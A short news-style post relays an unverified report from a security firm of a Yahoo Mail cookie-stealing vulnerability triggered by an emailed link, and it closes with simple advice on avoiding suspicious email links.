We have been recently contacted by an independent security solution provider company called “TechDefence Pvt Ltd” started by Sunny Vaghela telling us that they have discovered a vulnerability in Yahoo Account.
As per the information provided to us, there is a vulnerability in Yahoo account which provides access to an unauthorized person by the way of exploiting a browser cookie. The person who wants access to a Yahoo account sends a script to the other person using the yahoo account using email. On clicking the link, the script gets executed and sends the browser cookie to the attacker. By using this cookie, that unauthorized person can open the victim’s Yahoo account without needing to enter any password.
The shocking part of the story is that this script is not filtered by usual security softwares, spam filters etc. A small extract from the email communication we received says:
“The procedure is also very simple.he sends a script which is not a trojan nor a virus but just a common link as a use click or open the mail it grabs the information(Cookie) on the browser and sends to me. he has already tried the same on other service provider but it could not be done the as loophole lies with the coding of yahoo mail. Not only yahoo but all the information available on the browser can be stolen. All the sites, gateways which require yahoo id could be accessed after that. Which means if you access your job site, social networking or have yahoo mail id as alternate id to some other mail through your yahoo account it will give access to all.The shocking thing is that hacker’s IP address is not at all going to be logged on yahoo server even though he can access victim’s account or 48 hours.”
Although we have not tested this vulnerability and we do not guaranty the correctness of this information provided by TechDefence Pvt Ltd, yet its wise to stay safe than sorry. We bring this information to you just to keep you alert from a possible vulnerability which may or may not exist.
To keep safe from any such attacks, do not open email attachments of any kind from unidentified sources. Also, do not click on any links provided inside the email communication. If it is very necessary to open a particular link, copy the link address from the browser, without clicking it, and paste the link in some other Internet browser, other than from which you log into your Yahoo account. This way, even if the script executes, it may not be able to grab your browser cookies where you are signed in.
source – DailyPioneer